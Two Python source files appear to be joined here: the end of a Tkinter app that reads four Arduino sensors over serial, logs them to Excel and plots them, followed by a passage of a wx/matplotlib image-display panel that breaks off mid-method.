    gen = Button(self.Second, text="Generar", width=10, height=2, command= lambda : (self.generate(), self.Second.destroy()))
    gen.grid(row=2, column=0, padx=10, pady=10)
    cancel = Button(self.Second, text="Cancelar", width=10, height=2, command= lambda : (self.activate(), self.Second.destroy()))
    cancel.grid(row=2, column=2, padx=20, pady=5)
    self.Second.grid()
#Generates the report workbook from the rows stored in self.sheet.
def generate(self):
    """Export rows between the selected from/to dates to Reporte.xlsx."""
    self.activate()
    repBook = Workbook()
    currentSheet = repBook.active
    for row in self.sheet.values:
        # The header row is copied verbatim.
        if row[0] == "Tiempo":
            currentSheet.append(["Tiempo", "Sensor 1" , "Sensor 2" , "Sensor 3" , "Sensor 4" ])
        else:
            # Timestamp format is "yy-mm-dd HH:MM:SS"; split into [yy, mm, dd].
            a = row[0].split()[0].split('-')
            print(self.fmes.get())  # NOTE(review): leftover debug print
            # Skip rows before the "from" date; stop at the first row past the
            # "to" date (rows are appended chronologically, so break is safe).
            # NOTE(review): year/month/day are compared independently, which
            # misfilters ranges spanning a year or month boundary -- confirm.
            if int(a[0]) < int(self.fanio.get())-2000:
                pass
            elif int(a[0]) > int(self.sanio.get())-2000:
                break
            elif int(a[1]) < int(self.fmes.get()):
                pass
            elif int(a[1]) > int(self.smes.get()):
                break
            elif int(a[2]) < int(self.fdia.get()):
                pass
            elif int(a[2]) > int(self.sdia.get()):
                break
            else:
                currentSheet.append(row)
    repBook.save("Reporte.xlsx")
#Reads one sample from the Arduino and appends it to the workbook sheet.
def readFile(self):
    """Poll the Arduino once, log the sample, redraw, and re-arm the timer."""
    # Get the reply and check it for errors (0/None signals a bad read).
    info = self.requestData()
    if info == 0 or info == None:
        print("Error de respuesta")
    # Otherwise prepend a timestamp and store the four sensor values.
    else:
        # Timestamp in "yy-mm-dd HH:MM:SS", then the four float readings.
        d = dtime.now()
        feta = ["{}".format(d.strftime("%y-%m-%d %H:%M:%S"))]
        feta += info
        # Append the row, save the workbook, refresh the plots, and schedule
        # the next poll.  NOTE(review): saves "Hola.xlsx" while the module
        # loads 'hola.xlsx' -- different files on case-sensitive filesystems.
        self.sheet.append(feta)
        self.wb.save("Hola.xlsx")
        self.updateGraph()
        self.threading()
#Builds the connection dialog listing the available serial ports.
def connectSerial(self):
    """Show available serial ports and let the user pick one to open."""
    self.ConnectWindow = Toplevel(self.master, height=500, width= 500)
    frame = LabelFrame(self.ConnectWindow, text="Puertos disponibles")
    frame.grid(row=0, column=0, columnspan=3, sticky=N+S+E+W, padx=15, pady=10)
    # Close any open connection first to avoid conflicts.
    self.ser.close()
    # Enumerate ports and map the shown descriptions back to device names.
    ports = list(serial.tools.list_ports.comports())
    self.items = StringVar()
    self.portsDict = {x.description:x.name for x in ports}
    self.items.set([x.description for x in ports])
    # Listbox of available ports, first entry pre-selected.
    self.list = Listbox(frame, listvariable=self.items, width=35)
    self.list.select_set(0)
    self.list.grid(row=0, column=0, sticky=N+S+E+W, padx=15, pady=10)
    # Cancel / connect buttons.  fix: the originals used `A() & B()`, which
    # evaluates both calls but then raises TypeError on their None return
    # values inside the Tk callback; a tuple expression runs both cleanly.
    cncel = Button(self.ConnectWindow, text="Cancelar", width=10, height=2, command= lambda : (self.activate(), self.ConnectWindow.destroy()))
    cncel.grid(row=1, column=0, padx=30, pady=10)
    connect = Button(self.ConnectWindow, text="Connectar", width=10, height=2, command= lambda : (self.activate(), self.Connect()))
    connect.grid(row=1, column=2, padx=30, pady=10)
    self.ConnectWindow.grid()
#Connects to the port currently selected in the listbox.
def Connect(self):
    """Open the selected serial port and validate the Arduino handshake."""
    # Nothing selected: bail out.  Otherwise map the shown description back
    # to the device name collected by connectSerial().
    if self.list.get(ACTIVE) == None:
        return
    else:
        self.ser.port=self.portsDict[self.list.get(ACTIVE)]
    # Try to open the port and validate the Arduino; on success close the
    # dialog and start the polling loop.  Note the raise below is caught by
    # this method's own except, which shows the error dialog.
    try:
        self.ser.open()
        if self.validateSerial() < 0:
            self.ConnectWindow.destroy()
            raise Exception("Arduino no validado")
        else:
            messagebox.showinfo("Autentificacion satisfactoria","Mensaje de autentificacion validado correctamente")
            self.ConnectWindow.destroy()
            self.readFile()
    # If the port cannot be opened/validated, alert and close the dialog.
    except:
        messagebox.showerror("Puerto Serial no reconocido", "El puerto seleccionado no produce respuesta de autentificacion")
        self.ConnectWindow.destroy()
#Disables the action buttons while a modal operation is in progress.
def deactivate(self):
    """Disable the 'Reporte' and 'Continuar' buttons."""
    for button in (self.bresume, self.breport):
        button['state'] = "disabled"
#Re-enables the action buttons after a modal operation finishes.
def activate(self):
    """Re-enable the 'Reporte' and 'Continuar' buttons."""
    for button in (self.bresume, self.breport):
        button['state'] = "normal"
#Requests one sample set from the Arduino over the serial port.
def requestData(self):
    """Send 'R' and read four float readings.

    Returns a list of four floats on success, or 0 on a bad or NaN reply.
    """
    self.ser.write(b'R')
    answer = self.ser.read().decode()
    if answer == 'E':
        # Each line is "<value>\r\n"; strip the terminator and parse.
        data = [float(self.ser.readline().decode('UTF-8')[:-2]) for x in range(4)]
        # fix: the old check was `"nan" in data`, comparing the string "nan"
        # against floats, so it could never trigger; test for real NaNs
        # (NaN is the only value unequal to itself).
        if any(x != x for x in data):
            return 0
        return data
    return 0
#Performs the authorization handshake with the Arduino.
def validateSerial(self):
    """Send 'O' and wait for the 'K' acknowledgement.

    Retries a few times; returns 1 on success, -1 after repeated failures.
    """
    count = 0
    while True:
        # fix: the original used the bare global name `ser` (NameError in
        # this class) instead of the instance's serial object.
        self.ser.write(b'O')
        data = self.ser.read().decode()
        if data == 'K':
            return 1
        # fix: the original never incremented `count`, so a persistently
        # wrong reply looped forever instead of returning -1.
        count += 1
        if count > 3:
            return -1
#Arms the timer for the next sensor poll.
def threading(self):
    """Schedule the next readFile() after the spinbox interval (minutes)."""
    delay_ms = int(self.spin.get()) * 60000
    # fix: the original passed `self.master.after(...)`'s return value as the
    # Thread target -- calling after() immediately and handing the thread a
    # non-callable id.  Pass the callable and its arguments instead so the
    # scheduling happens inside the started thread.
    self.t1 = Thread(target=self.master.after, args=(delay_ms, self.readFile))
    self.t1.start()
#Refreshes the four sensor plots and the numeric value labels.
def updateGraph(self):
    """Redraw ~10 recent samples per sensor and update the value labels."""
    # Recent cells of each column (openpyxl column tuples).
    # NOTE(review): [-10:-1] excludes the most recent row, so the plots and
    # labels lag one sample behind what readFile() just appended -- confirm
    # whether [-10:] was intended.
    self.sensor1 = [a.value for a in self.sheet['B'][-10:-1]]
    self.sensor2 = [a.value for a in self.sheet['C'][-10:-1]]
    self.sensor3 = [a.value for a in self.sheet['D'][-10:-1]]
    self.sensor4 = [a.value for a in self.sheet['E'][-10:-1]]
    # Clear the figure container, then draw one subplot per sensor.
    self.fig.clf()
    self.s1 = self.fig.add_subplot(4, 1, 1, frameon=False).plot([x for x in range(len(self.sensor1))], self.sensor1, 'b')
    self.s2 = self.fig.add_subplot(4, 1, 2, frameon=False).plot([x for x in range(len(self.sensor2))], self.sensor2, 'r')
    self.s3 = self.fig.add_subplot(4, 1, 3, frameon=False).plot([x for x in range(len(self.sensor3))], self.sensor3, 'g')
    self.s4 = self.fig.add_subplot(4, 1, 4, frameon=False).plot([x for x in range(len(self.sensor4))], self.sensor4)
    self.cs1.draw()
    self.cs1.get_tk_widget().grid(row=0, column=1, rowspan=4, sticky=E)
    # Show the newest value of each stored window in the labels.
    self.sLabel1['text'] = str(self.sensor1[-1])+"*"
    self.sLabel2['text'] = str(self.sensor2[-1])+"*"
    self.sLabel3['text'] = str(self.sensor3[-1])+"*"
    self.sLabel4['text'] = str(self.sensor4[-1])+"*"
# --- application entry point: shared Tk variables and the UI object ---
root = Tk()
# Per-sensor visibility flags (IntVar used as a boolean).
s1 = IntVar()
s1.set(True)
s2 = IntVar()
s2.set(True)
s3 = IntVar()
s3.set(True)
s4 = IntVar()
s4.set(True)
# Shared report date range (to-day/month, from-day/month, year), filled in
# by UI.report().
dia = IntVar()
ddia = IntVar()
mes = IntVar()
mmes = IntVar()
anio = IntVar()
# NOTE(review): readFile() saves to "Hola.xlsx" but this loads 'hola.xlsx';
# those are different files on case-sensitive filesystems -- confirm.
wb = load_workbook(filename = 'hola.xlsx')
# NOTE(review): `ser` is not defined anywhere visible in this part of the
# file; presumably a serial.Serial instance -- verify before running.
gui = UI(root, wb, ser)
root.mainloop() |
imagepanel.py | #!/usr/bin/python
##
## MPlot PlotPanel: a wx.Panel for 2D line plotting, using matplotlib
##
import sys
import time
import os
import wx
from threading import Thread
import numpy as np
import matplotlib
import matplotlib.cm as cmap
from matplotlib.figure import Figure
from matplotlib.gridspec import GridSpec
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg
from matplotlib.patches import Rectangle
from .imageconf import ImageConfig, RGB_COLORS
from .basepanel import BasePanel
from .utils import inside_poly, MenuItem
from .plotframe import PlotFrame
class ImagePanel(BasePanel):
    """
    MatPlotlib Image as a wx.Panel, suitable for embedding
    in any wx.Frame.  This provides a right-click popup
    menu for configuration, zoom by dragging, saving an image
    figure, and Ctrl-C for copy-image-to-clipboard, customizations
    of colormap, interpolation, and intensity scaling.

    For more features, see PlotFrame, which embeds a PlotPanel
    and also provides a Menu, StatusBar, and Printing support.
    """
    def __init__(self, parent, messenger=None, data_callback=None,
                 cursor_callback=None, lasso_callback=None,
                 redraw_callback=None, zoom_callback=None,
                 contour_callback=None, size=(525, 450), dpi=100,
                 output_title='Image', **kws):
        matplotlib.rc('lines', linewidth=2)
        BasePanel.__init__(self, parent,
                           output_title=output_title,
                           messenger=messenger,
                           zoom_callback=zoom_callback, **kws)
        self.conf = ImageConfig()
        self.conf.title = output_title
        self.cursor_mode = 'zoom'
        self.data_callback = data_callback
        self.cursor_callback = cursor_callback
        self.lasso_callback = lasso_callback
        self.contour_callback = contour_callback
        self.redraw_callback = redraw_callback
        self.slice_plotframe = None
        self.win_config = None
        self.size = size
        self.dpi = dpi
        self.user_limits = {}
        # fix: was `self.scalerbar_text` (typo) -- the attribute that
        # redraw() later removes as `self.scalebar_text` was never
        # initialized (masked by the bare except in redraw()).
        self.scalebar_rect = self.scalebar_text = None
        self.BuildPanel()

    @property
    def xdata(self):
        return self.conf.xdata

    @xdata.setter
    def xdata(self, value):
        self.conf.xdata = value

    @property
    def ydata(self):
        return self.conf.ydata

    @ydata.setter
    def ydata(self, value):
        self.conf.ydata = value

    def display(self, data, x=None, y=None, xlabel=None, ylabel=None,
                style=None, nlevels=None, levels=None, contour_labels=None,
                store_data=True, col=0, unzoom=True, show_axis=False,
                auto_contrast=False, contrast_level=0, colormap=None, **kws):
        """
        generic display, using imshow (default) or contour
        """
        if style is not None:
            self.conf.style = style
        self.axes.cla()
        conf = self.conf
        conf.log_scale = False
        conf.show_axis = show_axis
        conf.highlight_areas = []
        if 1 in data.shape:
            data = data.squeeze()
        self.data_range = [0, data.shape[1], 0, data.shape[0]]
        if contrast_level not in (0, None):
            conf.contrast_level = contrast_level
        if auto_contrast:
            conf.contrast_level = 1
        # x/y coordinate arrays are kept only if they match the data shape.
        if x is not None:
            conf.xdata = np.array(x)
            if conf.xdata.shape[0] != data.shape[1]:
                conf.xdata = None
        if y is not None:
            conf.ydata = np.array(y)
            if conf.ydata.shape[0] != data.shape[0]:
                conf.ydata = None
        if xlabel is not None:
            conf.xlab = xlabel
        if ylabel is not None:
            conf.ylab = ylabel
        if store_data:
            conf.data = data

        if self.conf.style == 'contour':
            if levels is None:
                levels = self.conf.ncontour_levels
            else:
                self.conf.ncontour_levels = levels
            if nlevels is None:
                nlevels = self.conf.ncontour_levels = 9
            nlevels = max(2, nlevels)
            if conf.contrast_level is not None:
                contrast = [conf.contrast_level, 100.0-conf.contrast_level]
                imin, imax = np.percentile(conf.data, contrast)
                data = np.clip(conf.data, imin, imax)
            clevels = np.linspace(data.min(), data.max(), nlevels+1)
            self.conf.contour_levels = clevels
            self.conf.image = self.axes.contourf(data, cmap=self.conf.cmap[col],
                                                 levels=clevels)
            self.conf.contour = self.axes.contour(data, cmap=self.conf.cmap[col],
                                                  levels=clevels)
            # pick a contrasting colormap for the contour lines
            cmap_name = self.conf.cmap[col].name
            xname = 'gray'
            try:
                if cmap_name == 'gray_r':
                    xname = 'Reds_r'
                elif cmap_name == 'gray':
                    xname = 'Reds'
                elif cmap_name.endswith('_r'):
                    xname = 'gray_r'
            except:
                pass
            self.conf.contour.set_cmap(getattr(cmap, xname))
            if contour_labels is None:
                contour_labels = self.conf.contour_labels
            if contour_labels:
                # choose a label format based on the level spacing magnitude
                nlog = np.log10(abs(clevels[1]-clevels[0]))
                fmt = "%.4f"
                if nlog < -2:
                    fmt = "%%.%df" % (1-nlog)
                elif nlog > 2:
                    fmt = "%.1f"
                self.axes.clabel(self.conf.contour, fontsize=10, inline=1, fmt=fmt)
            if hasattr(self.contour_callback , '__call__'):
                self.contour_callback(levels=clevels)
        else:
            # image style: normalize to [0, 1] unless the data is constant
            if data.max() == data.min():
                img = data
            else:
                img = (data - data.min()) /(1.0*data.max() - data.min())
            if colormap is not None:
                self.conf.set_colormap(colormap, icol=col)
            self.conf.image = self.axes.imshow(img, cmap=self.conf.cmap[col],
                                               interpolation=self.conf.interp)
        self.autoset_margins()
        if unzoom:
            self.unzoom_all()
        if hasattr(self.data_callback, '__call__'):
            self.data_callback(data, x=x, y=y, **kws)
        # pixel-index table is computed in the background for lasso selection
        self.conf.indices = None
        self.indices_thread = Thread(target=self.calc_indices, args=(data.shape, ))
        self.indices_thread.start()

    def update_image(self, data):
        """
        update image on panel, as quickly as possible
        """
        if 1 in data.shape:
            data = data.squeeze()
        if self.conf.contrast_level is not None:
            clevels = [self.conf.contrast_level, 100.0-self.conf.contrast_level]
            imin, imax = np.percentile(data, clevels)
            data = np.clip((data - imin)/(imax - imin + 1.e-8), 0, 1)
        self.axes.images[0].set_data(data)
        self.canvas.draw()

    def autoset_margins(self):
        """auto-set margins left, bottom, right, top
        according to the specified margins (in pixels)
        and axes extent (taking into account labels,
        title, axis)
        """
        if self.conf.show_axis:
            self.axes.set_axis_on()
            if self.conf.show_grid:
                self.axes.grid(True,
                               alpha=self.conf.grid_alpha,
                               color=self.conf.grid_color)
            else:
                self.axes.grid(False)
            self.conf.set_formatters()
            l, t, r, b = 0.08, 0.96, 0.96, 0.08
            if self.conf.xlab is not None:
                self.axes.set_xlabel(self.conf.xlab)
                b, t = 0.11, 0.96
            if self.conf.ylab is not None:
                self.axes.set_ylabel(self.conf.ylab)
                l, r = 0.11, 0.96
        else:
            self.axes.set_axis_off()
            l, t, r, b = 0.01, 0.99, 0.99, 0.01
        self.gridspec.update(left=l, top=t, right=r, bottom=b)
        for ax in self.fig.get_axes():
            ax.update_params()
            ax.set_position(ax.figbox)

    def add_highlight_area(self, mask, label=None, col=0):
        """add a highlighted area -- outline an arbitrarily shape --
        as if drawn from a Lasso event.

        This takes a mask, which should be a boolean array of the
        same shape as the image.
        """
        patch = mask * np.ones(mask.shape) * 0.9
        cmap = self.conf.cmap[col]
        area = self.axes.contour(patch, cmap=cmap, levels=[0, 1])
        self.conf.highlight_areas.append(area)
        col = None
        if hasattr(cmap, '_lut'):
            # invert the colormap's base color for a visible outline
            rgb = [int(i*240)^255 for i in cmap._lut[0][:3]]
            col = '#%02x%02x%02x' % (rgb[0], rgb[1], rgb[2])
        if label is not None:
            def fmt(*args, **kws): return label
            self.axes.clabel(area, fontsize=9, fmt=fmt,
                             colors=col, rightside_up=True)
        if col is not None:
            for l in area.collections:
                l.set_color(col)
        self.canvas.draw()

    def set_viewlimits(self, axes=None):
        """ update xy limits of a plot"""
        if axes is None:
            axes = self.axes
        xmin, xmax, ymin, ymax = self.data_range
        if len(self.conf.zoom_lims) > 1:
            zlims = self.conf.zoom_lims[-1]
            if axes in zlims:
                xmin, xmax, ymin, ymax = zlims[axes]
            # clamp the zoom window to the data range
            xmin = max(self.data_range[0], xmin)
            xmax = min(self.data_range[1], xmax)
            ymin = max(self.data_range[2], ymin)
            ymax = min(self.data_range[3], ymax)
            if (xmax < self.data_range[0] or
                xmin > self.data_range[1] or
                ymax < self.data_range[2] or
                ymin > self.data_range[3] ):
                self.conf.zoom_lims.pop()
                return
        # enforce a minimum 2-pixel span in each direction
        if abs(xmax-xmin) < 2:
            xmin = int(0.5*(xmax+xmin) - 1)
            xmax = xmin + 2
        if abs(ymax-ymin) < 2:
            # fix: was 0.5*(ymax+xmin) -- a copy-paste bug mixing x into the
            # y-center calculation.
            ymin = int(0.5*(ymax+ymin) - 1)
            ymax = ymin + 2
        self.axes.set_xlim((xmin, xmax),emit=True)
        self.axes.set_ylim((ymin, ymax),emit=True)
        self.axes.update_datalim(((xmin, ymin), (xmax, ymax)))
        self.conf.datalimits = [xmin, xmax, ymin, ymax]
        self.conf.reset_formats()
        self.redraw()

    def clear(self):
        """ clear plot """
        self.axes.cla()
        self.conf.title = ''

    ####
    ## create GUI
    ####
    def BuildPanel(self):
        """ builds basic GUI panel and popup menu"""
        figsize = (1.0*self.size[0]/self.dpi, 1.0*self.size[1]/self.dpi)
        self.fig = Figure(figsize, dpi=self.dpi)
        self.gridspec = GridSpec(1,1)
        self.axes = self.fig.add_subplot(self.gridspec[0],
                                         facecolor='#FFFFFD')
        self.canvas = FigureCanvasWxAgg(self, -1, self.fig)
        self.conf.axes = self.axes
        self.conf.fig = self.fig
        self.conf.canvas= self.canvas
        # self.canvas.SetCursor(wx.StockCursor(wx.CURSOR_ARROW))
        # This way of adding to sizer allows resizing
        sizer = wx.BoxSizer(wx.HORIZONTAL)
        sizer.Add(self.canvas, 1, wx.ALL|wx.GROW)
        self.SetSizer(sizer)
        self.Fit()
        self.addCanvasEvents()

    def BuildPopup(self):
        # build pop-up menu for right-click display
        self.popup_menu = popup = wx.Menu()
        MenuItem(self, popup, 'Zoom out', '', self.unzoom)
        MenuItem(self, popup, 'Zoom all the way out', '', self.unzoom_all)
        self.popup_menu.AppendSeparator()
        MenuItem(self, popup, 'Rotate 90deg  (CW)', '', self.rotate90)
        MenuItem(self, popup, 'Save Image', '', self.save_figure)

    def rotate90(self, event=None, display=True):
        "rotate 90 degrees, CW"
        self.conf.rotate90()
        if display:
            conf = self.conf
            self.display(conf.data, x=conf.xdata, y=conf.ydata,
                         xlabel=conf.xlab, ylabel=conf.ylab,
                         show_axis=conf.show_axis,
                         levels=conf.ncontour_levels)

    def flip_horiz(self):
        "flip the image left-right"
        self.conf.flip_horiz()

    def flip_vert(self):
        "flip the image top-bottom"
        self.conf.flip_vert()

    def restore_flips_rotations(self):
        "restore flips and rotations"
        conf = self.conf
        if conf.flip_lr:
            self.flip_horiz()
        if conf.flip_ud:
            self.flip_vert()
        if conf.rot_level != 0:
            for i in range(4-conf.rot_level):
                self.rotate90(display=False)
            self.display(conf.data, x=conf.xdata, y=conf.ydata,
                         xlabel=conf.xlab, ylabel=conf.ylab,
                         show_axis=conf.show_axis)

    def toggle_curmode(self, event=None):
        "toggle cursor mode between zoom and lasso"
        if self.cursor_mode == 'zoom':
            self.cursor_mode = 'lasso'
        else:
            self.cursor_mode = 'zoom'

    ####
    ## GUI events, overriding BasePanel components
    ####
    def calc_indices(self, shape):
        """calculates and stores the set of indices
        ix=[0, nx-1], iy=[0, ny-1] for data of shape (nx, ny)"""
        if len(shape) == 2:
            ny, nx = shape
        elif len(shape) == 3:
            ny, nx, nchan = shape
        inds = []
        for iy in range(ny):
            inds.extend([(ix, iy) for ix in range(nx)])
        self.conf.indices = np.array(inds)

    def lassoHandler(self, vertices):
        """build a boolean mask of the lassoed pixels and hand it to the
        lasso callback"""
        # wait for the background index calculation, if still running
        if self.conf.indices is None or self.indices_thread.is_alive():
            self.indices_thread.join()
        ind = self.conf.indices
        mask = inside_poly(vertices,ind)
        mask.shape = (self.conf.data.shape[0], self.conf.data.shape[1])
        self.lasso = None
        self.canvas.draw()
        if hasattr(self.lasso_callback , '__call__'):
            self.lasso_callback(mask=mask)

    def unzoom(self, event=None, set_bounds=True):
        """ zoom out 1 level, or to full data range """
        lims = None
        if len(self.conf.zoom_lims) > 1:
            lims = self.conf.zoom_lims.pop()
        ax = self.axes
        if lims is None: # auto scale
            self.conf.zoom_lims = [None]
            xmin, xmax, ymin, ymax = self.data_range
            lims = {self.axes: [xmin, xmax, ymin, ymax]}
        self.set_viewlimits()
        self.canvas.draw()

    def zoom_leftup(self, event=None):
        """leftup event handler for zoom mode in images"""
        if self.zoom_ini is None:
            return
        ini_x, ini_y, ini_xd, ini_yd = self.zoom_ini
        try:
            dx = abs(ini_x - event.x)
            dy = abs(ini_y - event.y)
        except:
            dx, dy = 0, 0
        t0 = time.time()
        self.rbbox = None
        self.zoom_ini = None
        # ignore tiny drags and double-fires within 0.1 s
        if (dx > 3) and (dy > 3) and (t0-self.mouse_uptime)>0.1:
            self.mouse_uptime = t0
            zlims, tlims = {}, {}
            ax = self.axes
            xmin, xmax = ax.get_xlim()
            ymin, ymax = ax.get_ylim()
            zlims[ax] = [xmin, xmax, ymin, ymax]
            if len(self.conf.zoom_lims) == 0:
                self.conf.zoom_lims.append(zlims)
            ax_inv = ax.transData.inverted
            try:
                x1, y1 = ax_inv().transform((event.x, event.y))
            except:
                x1, y1 = self.x_lastmove, self.y_lastmove
            try:
                x0, y0 = ax_inv().transform((ini_x, ini_y))
            except:
                x0, y0 = ini_xd, ini_yd
            tlims[ax] = [int(round(min(x0, x1))), int(round(max(x0, x1))),
                         int(round(min(y0, y1))), int(round(max(y0, y1)))]
            self.conf.zoom_lims.append(tlims)
            # now apply limits:
            self.set_viewlimits()
            if callable(self.zoom_callback):
                self.zoom_callback(wid=self.GetId(), limits=tlims[ax])

    def unzoom_all(self, event=None):
        """ zoom out full data range """
        self.conf.zoom_lims = [None]
        self.unzoom(event)

    def redraw(self, col=0):
        """redraw image, applying
        - log scaling,
        - max/min values from sliders or explicit intensity ranges
        - color map
        - interpolation
        """
        conf = self.conf
        img = conf.data
        if img is None: return
        if len(img.shape) == 2:
            col = 0
        if self.conf.style == 'image':
            if conf.log_scale:
                img = np.log10(1 + 9.0*img)
        # apply intensity scale for current limited (zoomed) image
        if len(img.shape) == 2:
            # apply clipped color scale, as from sliders
            imin = float(conf.int_lo[col])
            imax = float(conf.int_hi[col])
            if conf.log_scale:
                imin = np.log10(1 + 9.0*imin)
                imax = np.log10(1 + 9.0*imax)
            (xmin, xmax, ymin, ymax) = self.conf.datalimits
            if xmin is None: xmin = 0
            if xmax is None: xmax = img.shape[1]
            if ymin is None: ymin = 0
            if ymax is None: ymax = img.shape[0]
            img = (img - imin)/(imax - imin + 1.e-8)
            mlo = conf.cmap_lo[0]/(1.0*conf.cmap_range)
            mhi = conf.cmap_hi[0]/(1.0*conf.cmap_range)
            if self.conf.style == 'image':
                conf.image.set_data(np.clip((img - mlo)/(mhi - mlo + 1.e-8), 0, 1))
                conf.image.set_interpolation(conf.interp)
        else:
            # RGB image: scale each channel independently
            r, g, b = img[:,:,0], img[:,:,1], img[:,:,2]
            rmin = float(conf.int_lo[0])
            rmax = float(conf.int_hi[0])
            gmin = float(conf.int_lo[1])
            gmax = float(conf.int_hi[1])
            bmin = float(conf.int_lo[2])
            bmax = float(conf.int_hi[2])
            if conf.log_scale:
                rmin = np.log10(1 + 9.0*rmin)
                rmax = np.log10(1 + 9.0*rmax)
                gmin = np.log10(1 + 9.0*gmin)
                gmax = np.log10(1 + 9.0*gmax)
                bmin = np.log10(1 + 9.0*bmin)
                bmax = np.log10(1 + 9.0*bmax)
            rlo = conf.cmap_lo[0]/(1.0*conf.cmap_range)
            rhi = conf.cmap_hi[0]/(1.0*conf.cmap_range)
            glo = conf.cmap_lo[1]/(1.0*conf.cmap_range)
            ghi = conf.cmap_hi[1]/(1.0*conf.cmap_range)
            blo = conf.cmap_lo[2]/(1.0*conf.cmap_range)
            bhi = conf.cmap_hi[2]/(1.0*conf.cmap_range)
            r = (r - rmin)/(rmax - rmin + 1.e-8)
            g = (g - gmin)/(gmax - gmin + 1.e-8)
            b = (b - bmin)/(bmax - bmin + 1.e-8)
            inew = img*1.0
            inew[:,:,0] = np.clip((r - rlo)/(rhi - rlo + 1.e-8), 0, 1)
            inew[:,:,1] = np.clip((g - glo)/(ghi - glo + 1.e-8), 0, 1)
            inew[:,:,2] = np.clip((b - blo)/(bhi - blo + 1.e-8), 0, 1)
            whitebg = conf.tricolor_bg.startswith('wh')
            if whitebg:
                inew = conf.tricolor_white_bg(inew)
            if self.conf.style == 'image':
                conf.image.set_data(inew)
                conf.image.set_interpolation(conf.interp)
        # remove any existing scalebar artists before (re)drawing them
        try:
            self.scalebar_rect.remove()
        except:
            pass
        try:
            self.scalebar_text.remove()
        except:
            pass
        if conf.scalebar_show:
            ystep, xstep = conf.scalebar_pixelsize
            if xstep is None or ystep is None:
                ystep, xstep = 1, 1
                if conf.xdata is not None:
                    xstep = abs(np.diff(conf.xdata).mean())
                if conf.ydata is not None:
                    ystep = abs(np.diff(conf.ydata).mean())
                self.scalebar_pixelsize = ystep, xstep
            y, x = conf.scalebar_pos
            y, x = int(y), int(x)
            h, w = conf.scalebar_size
            h, w = int(h), int(w/xstep)
            col = conf.scalebar_color
            self.scalebar_rect = Rectangle((x, y), w, h,linewidth=1, edgecolor=col,
                                           facecolor=col)
            self.axes.add_patch(self.scalebar_rect)
            if conf.scalebar_showlabel:
                x = int(x + w/4)
                y = y - 3*h
                self.scalebar_text = self.axes.text(x, y, conf.scalebar_label,
                                                    color=col)
        self.canvas.draw()
        if callable(self.redraw_callback):
            self.redraw_callback(wid=self.GetId())

    def report_motion(self, event=None):
        """write the cursor position to the status bar; optionally update
        the slice plot while the mouse moves"""
        if event.inaxes is None:
            return
        fmt = "X,Y= %g, %g"
        x, y  = event.xdata, event.ydata
        if len(self.fig.get_axes()) > 1:
            try:
                x, y = self.axes.transData.inverted().transform((x, y))
            except:
                pass
        if self.motion_sbar is None:
            try:
                self.motion_sbar = self.nstatusbar-1
            except AttributeError:
                self.motion_sbar = 1
        self.write_message(fmt % (x, y), panel=self.motion_sbar)
        conf = self.conf
        if conf.slice_onmotion:
            ix, iy = int(round(x)), int(round(y))
            if (ix >= 0 and ix < conf.data.shape[1] and
                iy >= 0 and iy < conf.data.shape[0]):
                conf.slice_xy = ix, iy
                self.update_slices()

    def report_leftdown(self,event=None):
        """write the clicked pixel's position and intensity to the status
        bar and update the slice plot"""
        if event is None:
            return
        if event.xdata is None or event.ydata is None:
            return
        ix, iy = int(round(event.xdata)), int(round(event.ydata))
        conf = self.conf
        if (ix >= 0 and ix < conf.data.shape[1] and
            iy >= 0 and iy < conf.data.shape[0]):
            pos = ''
            if conf.xdata is not None:
                pos = ' %s=%.4g,' % (conf.xlab, conf.xdata[ix])
            if conf.ydata is not None:
                pos = '%s %s=%.4g,' % (pos, conf.ylab, conf.ydata[iy])
            dval = conf.data[iy, ix]
            if len(conf.data.shape) == 3:
                dval = "%.4g, %.4g, %.4g" % tuple(dval)
            else:
                dval = "%.4g" % dval
            msg = "Pixel [%i, %i], %s Intensity=%s " % (ix, iy, pos, dval)
            self.write_message(msg, panel=0)
            conf.slice_xy = ix, iy
            self.update_slices()
        if hasattr(self.cursor_callback , '__call__'):
            self.cursor_callback(x=event.xdata, y=event.ydata)

    def get_slice_plotframe(self):
        """return (new_plotter, PlotFrame) for slice plots, raising an
        existing frame or creating a new one next to the parent"""
        shown = False
        new_plotter = False
        if self.slice_plotframe is not None:
            try:
                self.slice_plotframe.Raise()
                shown = True
            except:
                pass
        if not shown:
            self.slice_plotframe = pf = PlotFrame(self)
            new_plotter = True
            try:
                xpos, ypos = self.parent.GetPosition()
                xsiz, ysiz = self.parent.GetSize()
                pf.SetPosition((xpos+xsiz+10, ypos))
            except:
                pass
        return new_plotter, self.slice_plotframe

    def update_slices(self):
        """plot the X or Y slice through the current slice_xy point,
        summed over slice_width rows/columns"""
        if self.conf.slices in ('None', None, 0):
            return
        x, y = -1, -1
        try:
            x, y = [int(a) for a in self.conf.slice_xy]
        except:
            return
        if len(self.conf.data.shape) == 3:
            ymax, xmax, nc = self.conf.data.shape
        elif len(self.conf.data.shape) == 2:
            ymax, xmax = self.conf.data.shape
            nc = 0
        else:
            return
        if x < 0 or y < 0 or x > xmax or y > ymax:
            return
        wid = int(self.conf.slice_width)
        new_plotter, pf = self.get_slice_plotframe()
        popts = {'ylabel': 'Intensity', 'linewidth': 3}
        if self.conf.slices.lower() == 'x':
            y1 = int(y - wid/2. + 1)
            y2 = int(y + wid/2.) + 1
            if y1 < 0: y1 = 0
            if y2 > ymax: y2 = ymax
            _x = self.conf.xdata
            if _x is None:
                _x = np.arange(self.conf.data.shape[1])
            _y = self.conf.data[y1:y2].sum(axis=0)
            popts['xlabel'] = 'X'
            popts['title'] = 'X Slice: Y=%d:%d' % (y1, y2)
            if y2 == y1+1:
                popts['title'] = 'X Slice: Y=%d' % y1
        else:
            x1 = int(x - wid/2.0 + 1)
            x2 = int(x + wid/2.0) + 1
            if x1 < 0: x1 = 0
            if x2 > xmax: x2 = xmax
            _x = self.conf.ydata
            if _x is None:
                _x = np.arange(self.conf.data.shape[0])
            _y = self.conf.data[:,x1:x2].sum(axis=1)
            popts['xlabel'] = 'Y'
            popts['title'] = 'Y Slice: X=%d:%d' % (x1, x2)
            if x2 == x1+1:
                popts['title'] = 'Y Slice: X=%d' % x1
        if new_plotter:
            # RGB data plots one line per channel
            if len(_y.shape) == 2 and _y.shape[1] == 3:
                pf.plot(_x, _y[:, 0], color=RGB_COLORS[0], delay_draw=True, **popts)
                pf.oplot(_x, _y[:, 1], color=RGB_COLORS[1], delay_draw=True, **popts)
                pf.oplot(_x, _y[:, 2], color=RGB_COLORS[2], **popts)
            else:
                pf.plot(_x, _y, **popts)
        else:
